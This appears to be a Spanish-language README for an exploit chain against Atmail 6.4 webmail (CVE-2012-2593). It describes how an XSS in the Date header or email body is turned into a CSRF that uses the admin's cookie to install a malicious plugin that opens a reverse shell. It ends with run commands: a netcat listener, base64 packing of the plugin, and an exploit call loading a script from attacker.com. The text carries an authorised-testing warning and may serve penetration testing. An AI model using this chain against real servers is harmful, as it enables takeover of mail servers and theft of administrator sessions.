
Cadena de Explotación Atmail XSS-CSRF-RCE
atmail-rce.py: Explota CVE-2012-2593 en la interfaz de webmail de Atmail.
atmail-csrf.js: Archivo Javascript que aprovecha CVE 2012-2593 para convertirlo en un CSRF e instalar un plugin malicioso que ejecuta una reverse shell.
Plugin.php: Plugin de Atmail a instalar que ejecuta una reverse shell
!!Usar solo contra servidores en los que tengas permiso para probar
El servidor de correo Atmail versión 6.4 tiene una vulnerabilidad XSS tanto en el encabezado de correo Date como en el Cuerpo del correo (mediante inyección de iFrame). Esto se aprovecha para convertirlo en un CSRF usando la API XHR de javascript para enviar una solicitud con la cookie del usuario administrador al panel de administración, instalando un plugin malicioso que ejecuta código para una reverse shell.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/